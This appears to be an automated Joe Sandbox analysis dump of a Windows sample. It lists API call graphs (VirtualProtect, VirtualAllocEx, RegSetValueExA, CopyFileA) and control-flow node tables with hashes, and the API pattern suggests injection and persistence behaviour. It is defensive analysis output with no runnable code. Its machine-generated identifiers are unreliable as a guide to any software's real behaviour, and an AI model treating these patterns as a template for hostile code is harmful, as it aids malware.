5b079dc 57815->57829 57816->57811 57820 5b078f8 57819->57820 57821 5b07ad4 2 API calls 57820->57821 57822 5b079dc 2 API calls 57820->57822 57823 5b07923 57820->57823 57821->57823 57822->57823 57823->57811 57826 5b07ada 57824->57826 57825 5b07bc7 57825->57816 57826->57825 57827 5b31e90 VirtualProtect 57826->57827 57828 5b31e88 VirtualProtect 57826->57828 57827->57826 57828->57826 57831 5b079fe 57829->57831 57830 5b07bc7 57830->57816 57831->57830 57832 5b31e90 VirtualProtect 57831->57832 57833 5b31e88 VirtualProtect 57831->57833 57832->57831 57833->57831 58239 5b9f240 58240 5b9f284 VirtualAlloc 58239->58240 58242 5b9f2f1 58240->58242 57895 2a6d01c 57896 2a6d034 57895->57896 57897 2a6d08f 57896->57897 57899 5b9e360 57896->57899 57900 5b9e3b9 57899->57900 57903 5b9e8f0 57900->57903 57901 5b9e3ee 57904 5b9e91d 57903->57904 57905 5b9d778 VirtualProtect 57904->57905 57907 5b9eab3 57904->57907 57906 5b9eaa4 57905->57906 57906->57901 57907->57901 57834 2ab4bb0 57835 2ab4bcd 57834->57835 57836 2ab4bdd 57835->57836 57840 5b90dfb 57835->57840 57844 5b91fbe 57835->57844 57847 5b9262d 57835->57847 57841 5b90e1a 57840->57841 57851 5b9d778 57841->57851 57846 5b9d778 VirtualProtect 57844->57846 57845 5b901cf 57846->57845 57848 5b9264c 57847->57848 57850 5b9d778 VirtualProtect 57848->57850 57849 5b901cf 57850->57849 57853 5b9d79f 57851->57853 57855 5b9dc78 57853->57855 57856 5b9dcc1 VirtualProtect 57855->57856 57858 5b901cf 57856->57858 57908 5b30708 57909 5b30757 NtProtectVirtualMemory 57908->57909 57911 5b307cf 57909->57911 57912 2abf815 57913 2abf81f 57912->57913 57917 5b37fb3 57913->57917 57935 5b37fb8 57913->57935 57914 2abf312 57918 5b37fb8 57917->57918 57919 5b37fe3 57918->57919 57953 5b3a053 57918->57953 57958 5b39b4e 57918->57958 57962 5b3948f 57918->57962 57969 5b39769 57918->57969 57973 5b3892b 57918->57973 57977 5b3a005 57918->57977 57981 5b38cc6 57918->57981 57985 5b39d23 57918->57985 57989 5b39543 57918->57989 57993 5b39add 57918->57993 57997 5b39a5e 57918->57997 58002 5b38d98 57918->58002 58007 5b38a59 57918->58007 58011 5b38a7a 57918->58011 58015 5b38930 57918->58015 57919->57914 57936 5b37fcd 57935->57936 57937 5b3a053 2 API calls 57936->57937 57938 5b38930 2 API calls 57936->57938 57939 5b38a7a 2 API calls 57936->57939 57940 5b38a59 2 API calls 57936->57940 57941 5b38d98 2 API calls 57936->57941 57942 5b39a5e 2 API calls 57936->57942 57943 5b39add 2 API calls 57936->57943 57944 5b39543 2 API calls 57936->57944 57945 5b39d23 2 API calls 57936->57945 57946 5b37fe3 57936->57946 57947 5b38cc6 2 API calls 57936->57947 57948 5b3a005 2 API calls 57936->57948 57949 5b3892b 2 API calls 57936->57949 57950 5b39769 2 API calls 57936->57950 57951 5b3948f 4 API calls 57936->57951 57952 5b39b4e 2 API calls 57936->57952 57937->57946 57938->57946 57939->57946 57940->57946 57941->57946 57942->57946 57943->57946 57944->57946 57945->57946 57946->57914 57947->57946 57948->57946 57949->57946 57950->57946 57951->57946 57952->57946 57954 5b3a076 57953->57954 57955 5b389a2 57953->57955 57954->57919 57956 5b39c0e 57955->57956 58019 5b3bc20 57955->58019 57956->57919 57959 5b39b54 57958->57959 57960 5b39c0e 57959->57960 57961 5b3bc20 2 API calls 57959->57961 57960->57919 57961->57959 57963 5b394c9 57962->57963 58032 5b339c0 57963->58032 58036 5b339b4 57963->58036 57971 5b3976f 57969->57971 57970 5b39c0e 57970->57919 57971->57970 57972 5b3bc20 2 API calls 57971->57972 57972->57971 57974 5b38930 57973->57974 57975 5b39c0e 57974->57975 57976 5b3bc20 2 API calls 57974->57976 57975->57919 57976->57974 57978 5b389a2 57977->57978 57979 5b39c0e 57978->57979 57980 5b3bc20 2 API calls 57978->57980 57979->57919 57980->57978 57982 5b38a62 57981->57982 57982->57981 57983 5b39c0e 57982->57983 57984 5b3bc20 2 API calls 57982->57984 57983->57919 57984->57982 57986 5b38a62 57985->57986 57987 5b39c0e 57986->57987 57988 5b3bc20 2 API calls 57986->57988 57987->57919 57988->57986 57990 5b38a62 57989->57990 57991 5b39c0e 57990->57991 57992 5b3bc20 2 API calls 57990->57992 57991->57919 57992->57990 57994 5b38a62 57993->57994 57995 5b39c0e 57994->57995 57996 5b3bc20 2 API calls 57994->57996 57995->57919 57996->57994 57998 5b39a64 57997->57998 58040 5b3bd50 57998->58040 58045 5b3bd40 57998->58045 58003 5b38da2 58002->58003 58005 5b3bd50 2 API calls 58003->58005 58006 5b3bd40 2 API calls 58003->58006 58004 5b39ac3 58005->58004 58006->58004 58008 5b38a62 58007->58008 58009 5b39c0e 58008->58009 58010 5b3bc20 2 API calls 58008->58010 58009->57919 58010->58008 58012 5b38a62 58011->58012 58013 5b39c0e 58012->58013 58014 5b3bc20 2 API calls 58012->58014 58013->57919 58014->58012 58016 5b3895a 58015->58016 58017 5b39c0e 58016->58017 58018 5b3bc20 2 API calls 58016->58018 58017->57919 58018->58016 58020 5b3bc45 58019->58020 58024 5b33bf8 58020->58024 58028 5b33bec 58020->58028 58025 5b33c5d RegSetValueExA 58024->58025 58027 5b33d6a 58025->58027 58029 5b33bf8 RegSetValueExA 58028->58029 58031 5b33d6a 58029->58031 58033 5b33a19 RegOpenKeyExA 58032->58033 58035 5b33afa 58033->58035 58037 5b339be RegOpenKeyExA 58036->58037 58039 5b33afa 58037->58039 58041 5b3bd65 58040->58041 58050 5b33718 58041->58050 58054 5b3370c 58041->58054 58046 5b3bd50 58045->58046 58048 5b33718 CopyFileA 58046->58048 58049 5b3370c CopyFileA 58046->58049 58047 5b39ac3 58048->58047 58049->58047 58051 5b33774 CopyFileA 58050->58051 58053 5b338a5 58051->58053 58056 5b33718 58054->58056 58055 5b3386c CopyFileA 58057 5b338a5 58055->58057 58056->58055 58056->58056 58196 5b3efed 58197 5b3ef22 58196->58197 58198 5b3eff7 58196->58198 58202 5d41bd8 58197->58202 58207 5d41be8 58197->58207 58199 5b3ef67 58203 5d41be8 58202->58203 58212 5b31840 58203->58212 58216 5b31839 58203->58216 58204 5d41c1f 58204->58199 58208 5d41bfd 58207->58208 58210 5b31840 VirtualAllocEx 58208->58210 58211 5b31839 VirtualAllocEx 58208->58211 58209 5d41c1f 58209->58199 58210->58209 58211->58209 58213 5b31884 VirtualAllocEx 58212->58213 58215 5b318fc 58213->58215 58215->58204 58217 5b31840 VirtualAllocEx 58216->58217 58219 5b318fc 58217->58219 58219->58204

                                                                Executed Functions

                                                                Function 02AB0E60 Relevance: 3.1, Strings: 2, Instructions: 574COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1608 2ab0e60-2ab0ed7 1610 2ab0ed9 1608->1610 1611 2ab0ede-2ab0ef6 1608->1611 1610->1611 1613 2ab143f-2ab1458 1611->1613 1614 2ab0efc-2ab105e 1611->1614 1616 2ab145e-2ab1480 1613->1616 1617 2ab14e0-2ab1527 1613->1617 1671 2ab1098-2ab109a 1614->1671 1672 2ab1060-2ab1096 1614->1672 1622 2ab1486-2ab148e 1616->1622 1623 2ab1725 1616->1623 1628 2ab1539-2ab1541 1617->1628 1629 2ab1529-2ab1534 1617->1629 1622->1623 1626 2ab1494-2ab14ab 1622->1626 1627 2ab172a-2ab1733 1623->1627 1626->1623 1630 2ab14b1-2ab14db call 2ab0170 1626->1630 1633 2ab1740 1627->1633 1634 2ab1735 1627->1634 1636 2ab1543-2ab1564 1628->1636 1637 2ab1566 1628->1637 1635 2ab15dc-2ab1626 1629->1635 1630->1627 1642 2ab1741 1633->1642 1634->1633 1647 2ab16bb-2ab1723 1635->1647 1648 2ab162c-2ab165c 1635->1648 1640 2ab156d-2ab156f 1636->1640 1637->1640 1644 2ab157b-2ab159b 1640->1644 1645 2ab1571-2ab1579 1640->1645 1642->1642 1644->1635 1651 2ab159d-2ab15a6 1644->1651 1645->1635 1647->1627 1648->1623 1655 2ab1662-2ab1669 1648->1655 1651->1623 1654 2ab15ac-2ab15da 1651->1654 1654->1635 1654->1651 1655->1623 1657 2ab166f-2ab167b 1655->1657 1657->1623 1658 2ab1681-2ab168d 1657->1658 1658->1623 1660 2ab1693-2ab16b9 1658->1660 1660->1627 1673 2ab109c-2ab109e 1671->1673 1674 2ab10a0-2ab10aa 1671->1674 1672->1671 1676 2ab10ac-2ab10c2 1673->1676 1674->1676 1678 2ab10c8-2ab10d0 1676->1678 1679 2ab10c4-2ab10c6 1676->1679 1681 2ab10d2-2ab10d7 1678->1681 1679->1681 1683 2ab10d9-2ab10e8 1681->1683 1684 2ab10ee-2ab111c 1681->1684 1683->1684 1687 2ab111e-2ab112b 1684->1687 1688 2ab1153-2ab115d 1684->1688 1687->1688 1692 2ab112d-2ab113a 1687->1692 1689 2ab115f 1688->1689 1690 2ab1166-2ab11ec 1688->1690 1689->1690 1702 2ab11ee-2ab122a 1690->1702 1703 2ab122c-2ab123a 1690->1703 1696 2ab113c-2ab113e 1692->1696 1697 2ab1140-2ab114d 1692->1697 1696->1688 1697->1688 1706 2ab1245-2ab127e call 2ab2d30 1702->1706 1703->1706 1710 2ab1284-2ab134f 1706->1710 1715 2ab137d-2ab1399 1710->1715 1716 2ab1351-2ab137b 1710->1716 1719 2ab139b 1715->1719 1720 2ab13a7-2ab13a8 1715->1720 1716->1715 1719->1720 1720->1613
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1750739156.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_2ab0000_tmp2083.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: c4955513cf3fddfbb2b8050726e9526dd64237cc9a0392e0f8d0ded793145908
                                                                • Instruction ID: 201e224ea928801bbad4eadcfcc80bafa443e5904f629c8fbd1371ef624eba51
                                                                • Opcode Fuzzy Hash: c4955513cf3fddfbb2b8050726e9526dd64237cc9a0392e0f8d0ded793145908
                                                                • Instruction Fuzzy Hash: 2C328B75E012198FDB14CF79D894AAEB7F6BF88304F158669D00AEB355DB30A942CF90
                                                                Function 02AB0E52 Relevance: 2.9, Strings: 2, Instructions: 383COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1804 2ab0e52-2ab0e55 1805 2ab0e03-2ab0e05 1804->1805 1806 2ab0e57-2ab0e59 1804->1806 1807 2ab0e07-2ab0e31 1805->1807 1806->1807 1808 2ab0e5b-2ab0ed7 1806->1808 1813 2ab0e3a-2ab0e3c 1807->1813 1814 2ab0e33-2ab0e39 1807->1814 1811 2ab0ed9 1808->1811 1812 2ab0ede-2ab0ef6 1808->1812 1811->1812 1817 2ab143f-2ab1458 1812->1817 1818 2ab0efc-2ab105e 1812->1818 1927 2ab0e41 call 2ab0e9a 1813->1927 1928 2ab0e41 call 2ab0f0e 1813->1928 1929 2ab0e41 call 2ab0e52 1813->1929 1930 2ab0e41 call 2ab0e60 1813->1930 1816 2ab0e47-2ab0e4a 1820 2ab145e-2ab1480 1817->1820 1821 2ab14e0-2ab1527 1817->1821 1875 2ab1098-2ab109a 1818->1875 1876 2ab1060-2ab1096 1818->1876 1826 2ab1486-2ab148e 1820->1826 1827 2ab1725 1820->1827 1832 2ab1539-2ab1541 1821->1832 1833 2ab1529-2ab1534 1821->1833 1826->1827 1830 2ab1494-2ab14ab 1826->1830 1831 2ab172a-2ab1733 1827->1831 1830->1827 1834 2ab14b1-2ab14db call 2ab0170 1830->1834 1837 2ab1740 1831->1837 1838 2ab1735 1831->1838 1840 2ab1543-2ab1564 1832->1840 1841 2ab1566 1832->1841 1839 2ab15dc-2ab1626 1833->1839 1834->1831 1846 2ab1741 1837->1846 1838->1837 1851 2ab16bb-2ab1723 1839->1851 1852 2ab162c-2ab165c 1839->1852 1844 2ab156d-2ab156f 1840->1844 1841->1844 1848 2ab157b-2ab159b 1844->1848 1849 2ab1571-2ab1579 1844->1849 1846->1846 1848->1839 1855 2ab159d-2ab15a6 1848->1855 1849->1839 1851->1831 1852->1827 1859 2ab1662-2ab1669 1852->1859 1855->1827 1858 2ab15ac-2ab15da 1855->1858 1858->1839 1858->1855 1859->1827 1861 2ab166f-2ab167b 1859->1861 1861->1827 1862 2ab1681-2ab168d 1861->1862 1862->1827 1864 2ab1693-2ab16b9 1862->1864 1864->1831 1877 2ab109c-2ab109e 1875->1877 1878 2ab10a0-2ab10aa 1875->1878 1876->1875 1880 2ab10ac-2ab10c2 1877->1880 1878->1880 1882 2ab10c8-2ab10d0 1880->1882 1883 2ab10c4-2ab10c6 1880->1883 1885 2ab10d2-2ab10d7 1882->1885 1883->1885 1887 2ab10d9-2ab10e8 1885->1887 1888 2ab10ee-2ab111c 1885->1888 1887->1888 1891 2ab111e-2ab112b 1888->1891 1892 2ab1153-2ab115d 1888->1892 1891->1892 1896 2ab112d-2ab113a 1891->1896 1893 2ab115f 1892->1893 1894 2ab1166-2ab11ec 1892->1894 1893->1894 1906 2ab11ee-2ab122a 1894->1906 1907 2ab122c-2ab123a 1894->1907 1900 2ab113c-2ab113e 1896->1900 1901 2ab1140-2ab114d 1896->1901 1900->1892 1901->1892 1910 2ab1245-2ab127e call 2ab2d30 1906->1910 1907->1910 1914 2ab1284-2ab134f 1910->1914 1919 2ab137d-2ab1399 1914->1919 1920 2ab1351-2ab137b 1914->1920 1923 2ab139b 1919->1923 1924 2ab13a7-2ab13a8 1919->1924 1920->1919 1923->1924 1924->1817 1927->1816 1928->1816 1929->1816 1930->1816
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1750739156.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_2ab0000_tmp2083.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: bdd91ee4578fcca1190202c87d832a03e9453fe66252c091537fd7b6f03f893d
                                                                • Instruction ID: 20dee1bb674fc7b77bf86e47a8811e624626477b58d0a202ac2fb1d03f0520d0
                                                                • Opcode Fuzzy Hash: bdd91ee4578fcca1190202c87d832a03e9453fe66252c091537fd7b6f03f893d
                                                                • Instruction Fuzzy Hash: 34E18935E012298FDB14CF7AD894AAEB7F6BFC8304F158669D409AB255DB309906CF90
                                                                Function 02AB0E9A Relevance: 2.8, Strings: 2, Instructions: 346COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2057 2ab0e9a-2ab0eb0 2059 2ab0ebd-2ab0ed7 2057->2059 2060 2ab0eb2-2ab0ebc 2057->2060 2061 2ab0ed9 2059->2061 2062 2ab0ede-2ab0ef6 2059->2062 2061->2062 2064 2ab143f-2ab1458 2062->2064 2065 2ab0efc-2ab105e 2062->2065 2067 2ab145e-2ab1480 2064->2067 2068 2ab14e0-2ab1527 2064->2068 2122 2ab1098-2ab109a 2065->2122 2123 2ab1060-2ab1096 2065->2123 2073 2ab1486-2ab148e 2067->2073 2074 2ab1725 2067->2074 2079 2ab1539-2ab1541 2068->2079 2080 2ab1529-2ab1534 2068->2080 2073->2074 2077 2ab1494-2ab14ab 2073->2077 2078 2ab172a-2ab1733 2074->2078 2077->2074 2081 2ab14b1-2ab14db call 2ab0170 2077->2081 2084 2ab1740 2078->2084 2085 2ab1735 2078->2085 2087 2ab1543-2ab1564 2079->2087 2088 2ab1566 2079->2088 2086 2ab15dc-2ab1626 2080->2086 2081->2078 2093 2ab1741 2084->2093 2085->2084 2098 2ab16bb-2ab1723 2086->2098 2099 2ab162c-2ab165c 2086->2099 2091 2ab156d-2ab156f 2087->2091 2088->2091 2095 2ab157b-2ab159b 2091->2095 2096 2ab1571-2ab1579 2091->2096 2093->2093 2095->2086 2102 2ab159d-2ab15a6 2095->2102 2096->2086 2098->2078 2099->2074 2106 2ab1662-2ab1669 2099->2106 2102->2074 2105 2ab15ac-2ab15da 2102->2105 2105->2086 2105->2102 2106->2074 2108 2ab166f-2ab167b 2106->2108 2108->2074 2109 2ab1681-2ab168d 2108->2109 2109->2074 2111 2ab1693-2ab16b9 2109->2111 2111->2078 2124 2ab109c-2ab109e 2122->2124 2125 2ab10a0-2ab10aa 2122->2125 2123->2122 2127 2ab10ac-2ab10c2 2124->2127 2125->2127 2129 2ab10c8-2ab10d0 2127->2129 2130 2ab10c4-2ab10c6 2127->2130 2132 2ab10d2-2ab10d7 2129->2132 2130->2132 2134 2ab10d9-2ab10e8 2132->2134 2135 2ab10ee-2ab111c 2132->2135 2134->2135 2138 2ab111e-2ab112b 2135->2138 2139 2ab1153-2ab115d 2135->2139 2138->2139 2143 2ab112d-2ab113a 2138->2143 2140 2ab115f 2139->2140 2141 2ab1166-2ab11ec 2139->2141 2140->2141 2153 2ab11ee-2ab122a 2141->2153 2154 2ab122c-2ab123a 2141->2154 2147 2ab113c-2ab113e 2143->2147 2148 2ab1140-2ab114d 2143->2148 2147->2139 2148->2139 2157 2ab1245-2ab127e call 2ab2d30 2153->2157 2154->2157 2161 2ab1284-2ab134f 2157->2161 2166 2ab137d-2ab1399 2161->2166 2167 2ab1351-2ab137b 2161->2167 2170 2ab139b 2166->2170 2171 2ab13a7-2ab13a8 2166->2171 2167->2166 2170->2171 2171->2064
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1750739156.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_2ab0000_tmp2083.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: f0dae6f246d81d8ca02447e946401f3434d18bcd7558a219183cf46c96fb85b9
                                                                • Instruction ID: fc5e262fff0babec1da3b82caaa06144e445b678f7ec5a808c6afb09659a49c3
                                                                • Opcode Fuzzy Hash: f0dae6f246d81d8ca02447e946401f3434d18bcd7558a219183cf46c96fb85b9
                                                                • Instruction Fuzzy Hash: E2D17A35E412298FDB14DF6AD894AAEB7F6BFC8304F118669D409EB355DB309902CF90
                                                                Function 02AB0F0E Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2266 2ab0f0e-2ab105e 2284 2ab1098-2ab109a 2266->2284 2285 2ab1060-2ab1096 2266->2285 2286 2ab109c-2ab109e 2284->2286 2287 2ab10a0-2ab10aa 2284->2287 2285->2284 2289 2ab10ac-2ab10c2 2286->2289 2287->2289 2291 2ab10c8-2ab10d0 2289->2291 2292 2ab10c4-2ab10c6 2289->2292 2294 2ab10d2-2ab10d7 2291->2294 2292->2294 2296 2ab10d9-2ab10e8 2294->2296 2297 2ab10ee-2ab111c 2294->2297 2296->2297 2300 2ab111e-2ab112b 2297->2300 2301 2ab1153-2ab115d 2297->2301 2300->2301 2305 2ab112d-2ab113a 2300->2305 2302 2ab115f 2301->2302 2303 2ab1166-2ab11ec 2301->2303 2302->2303 2315 2ab11ee-2ab122a 2303->2315 2316 2ab122c-2ab123a 2303->2316 2309 2ab113c-2ab113e 2305->2309 2310 2ab1140-2ab114d 2305->2310 2309->2301 2310->2301 2319 2ab1245-2ab127e call 2ab2d30 2315->2319 2316->2319 2323 2ab1284-2ab134f 2319->2323 2328 2ab137d-2ab1399 2323->2328 2329 2ab1351-2ab137b 2323->2329 2332 2ab139b 2328->2332 2333 2ab13a7-2ab1458 2328->2333 2329->2328 2332->2333 2338 2ab145e-2ab1480 2333->2338 2339 2ab14e0-2ab1527 2333->2339 2342 2ab1486-2ab148e 2338->2342 2343 2ab1725 2338->2343 2347 2ab1539-2ab1541 2339->2347 2348 2ab1529-2ab1534 2339->2348 2342->2343 2345 2ab1494-2ab14ab 2342->2345 2346 2ab172a-2ab1733 2343->2346 2345->2343 2349 2ab14b1-2ab14db call 2ab0170 2345->2349 2351 2ab1740 2346->2351 2352 2ab1735 2346->2352 2354 2ab1543-2ab1564 2347->2354 2355 2ab1566 2347->2355 2353 2ab15dc-2ab1626 2348->2353 2349->2346 2359 2ab1741 2351->2359 2352->2351 2363 2ab16bb-2ab1723 2353->2363 2364 2ab162c-2ab165c 2353->2364 2357 2ab156d-2ab156f 2354->2357 2355->2357 2361 2ab157b-2ab159b 2357->2361 2362 2ab1571-2ab1579 2357->2362 2359->2359 2361->2353 2367 2ab159d-2ab15a6 2361->2367 2362->2353 2363->2346 2364->2343 2370 2ab1662-2ab1669 2364->2370 2367->2343 2369 2ab15ac-2ab15da 2367->2369 2369->2353 2369->2367 2370->2343 2371 2ab166f-2ab167b 2370->2371 2371->2343 2372 2ab1681-2ab168d 2371->2372 2372->2343 2373 2ab1693-2ab16b9 2372->2373 2373->2346
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1750739156.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_2ab0000_tmp2083.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: f74644b8ca7ad8070baf0ddd380e85ab7c177b86ffab900c2297dc8a22640b74
                                                                • Instruction ID: 209e2a09437e2438bc82d55c5b5bb8c517faccabfc6fe2b0cc0a92c933e4cb5f
                                                                • Opcode Fuzzy Hash: f74644b8ca7ad8070baf0ddd380e85ab7c177b86ffab900c2297dc8a22640b74
                                                                • Instruction Fuzzy Hash: C5C16B31E412298FDB14CF6AD894AAEB7F6BFC8304F158669D409EB355DB309906CB80
                                                                Function 02AB1743 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1750739156.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_2ab0000_tmp2083.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q
                                                                • API String ID: 0-2625958711
                                                                • Opcode ID: 54bcc53f6b7a1c019f6e0490eb4ac1258d9fc3c839e98cad6f919ee7fe53e88e
                                                                • Instruction ID: d8d2d78bdf2f340dff6f671a1c7157449b1d56f2505b7baf1336ba34897086b7
                                                                • Opcode Fuzzy Hash: 54bcc53f6b7a1c019f6e0490eb4ac1258d9fc3c839e98cad6f919ee7fe53e88e
                                                                • Instruction Fuzzy Hash: 18E18E71E012698FDB15CF68C890BEDBBF2BF89305F198595D009AB256DB34AD82CF50
                                                                Function 02AB0B88 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1750739156.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_2ab0000_tmp2083.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: 751e6b63c3220637764731564603b2f4181cd44a03227ab128d1777612ecd3f8
                                                                • Instruction ID: e4cb341ec3e5d92264dab1901fa51548e16bb883510272010821af15d13e79e2
                                                                • Opcode Fuzzy Hash: 751e6b63c3220637764731564603b2f4181cd44a03227ab128d1777612ecd3f8
                                                                • Instruction Fuzzy Hash: 8B81F878E8010E9FDF14CFA9D584AEEBBB1BF88300F10A655D416EB295DF31A941CB50
                                                                Function 02ABC124 Relevance: .5, Instructions: 471COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1750739156.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_2ab0000_tmp2083.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e74e6d7dbed88069eeb10433bd5782c4beee5299871372f60789e3a2f6b9677
                                                                • Instruction ID: a984e09882147ea0771ca482c97ab22ea0ed720b735e03de78edba8e0df01bed
                                                                • Opcode Fuzzy Hash: 9e74e6d7dbed88069eeb10433bd5782c4beee5299871372f60789e3a2f6b9677
                                                                • Instruction Fuzzy Hash: 4732B374A442298FCB65DF28C984BA9BBB6FF48310F1081D9E94DA7355DB30AE85CF44
                                                                Function 02AB2130 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 876 2ab2130-2ab2191 880 2ab219d-2ab21b1 876->880 881 2ab2193-2ab2197 876->881 883 2ab21bf-2ab21ca 880->883 881->880 885 2ab21b3-2ab21b6 883->885 885->883 886 2ab21b8 885->886 886->883 887 2ab2588-2ab259f 886->887 888 2ab222e-2ab2230 886->888 889 2ab240e-2ab2415 886->889 890 2ab21cc-2ab21e1 886->890 891 2ab21e3-2ab21f3 886->891 892 2ab2282-2ab2296 886->892 893 2ab2422-2ab2432 886->893 894 2ab2240-2ab2243 886->894 895 2ab229b-2ab22b2 886->895 896 2ab257b-2ab2586 886->896 897 2ab255e-2ab2579 call 2ab01c8 886->897 898 2ab21fc-2ab220f 886->898 899 2ab2211-2ab222c 886->899 900 2ab22b7 886->900 901 2ab21f5-2ab21fa 886->901 902 2ab2434-2ab244d 886->902 906 2ab2545-2ab2548 887->906 903 2ab22b8-2ab22bb 888->903 905 2ab2236-2ab223b 888->905 910 2ab241b-2ab2420 889->910 890->885 891->885 892->885 925 2ab23e7-2ab23ea 893->925 907 2ab2249-2ab225c 894->907 908 2ab25ed-2ab2659 894->908 895->885 896->906 897->906 898->885 899->885 900->903 901->885 914 2ab244f-2ab2451 902->914 915 2ab2453 902->915 903->894 913 2ab22bd-2ab230c call 2ab01b8 903->913 905->885 917 2ab254a 906->917 918 2ab2551-2ab255c 906->918 907->908 924 2ab2262-2ab226e 907->924 931 2ab265b 908->931 932 2ab269e 908->932 910->925 960 2ab2318-2ab2387 913->960 961 2ab230e-2ab2312 913->961 927 2ab2458-2ab245a 914->927 915->927 917->887 917->896 917->897 917->918 928 2ab25d3-2ab25ec 917->928 918->906 924->908 930 2ab2274-2ab227d 924->930 938 2ab23dc 925->938 939 2ab23ec 925->939 934 2ab245c 927->934 935 2ab2465 927->935 930->885 931->932 942 2ab267b-2ab2680 931->942 943 2ab2689-2ab268e 931->943 944 2ab266d-2ab2672 931->944 945 2ab2682-2ab2687 931->945 946 2ab2662-2ab2664 931->946 947 2ab2690-2ab2695 931->947 948 2ab2697-2ab269c 931->948 949 2ab2666-2ab266b 931->949 950 2ab2674-2ab2679 931->950 952 2ab26a1-2ab26a2 932->952 934->935 935->906 938->925 939->887 939->889 939->893 939->896 939->897 939->902 939->928 953 2ab23f3-2ab2407 939->953 942->952 943->952 944->952 945->952 946->952 947->952 948->952 949->952 950->952 953->889 970 2ab2389-2ab239c 960->970 971 2ab239e-2ab23b1 960->971 961->960 974 2ab23d3 970->974 976 2ab23ba 971->976 977 2ab23b3-2ab23b8 971->977 982 2ab23d3 call 2ab26e2 974->982 983 2ab23d3 call 2ab26f0 974->983 979 2ab23bc-2ab23be 976->979 977->979 978 2ab23d9 978->938 979->953 980 2ab23c0-2ab23d1 979->980 980->974 982->978 983->978
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1750739156.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_2ab0000_tmp2083.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$TJcq$TJcq$Te^q
                                                                • API String ID: 0-2400496369
                                                                • Opcode ID: cdc9f39aeca29d458b94abd2a91f5fb4e33979bca004743204b263c8c7f1351b
                                                                • Instruction ID: 9e402d8702d1149c17ace25e9c3223fc25ecf2358e1f8981e9434a837464fe2a
                                                                • Opcode Fuzzy Hash: cdc9f39aeca29d458b94abd2a91f5fb4e33979bca004743204b263c8c7f1351b
                                                                • Instruction Fuzzy Hash: 39E18C30B041448FDB06CB68D5A8BADBBF6EF89310F1545AAE946DB3A2CE35DC45CB41
                                                                Function 02AB0B78 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1750739156.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_2ab0000_tmp2083.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: ae015f7ac6d82f93766e3bb0e8e2f8788b9482e9e1d5818df993ccf7442e83fa
                                                                • Instruction ID: e017ba4bb10dd4a2bbf1e9d3914e702d1ed98faa257befdeae1bd4de544a52a2
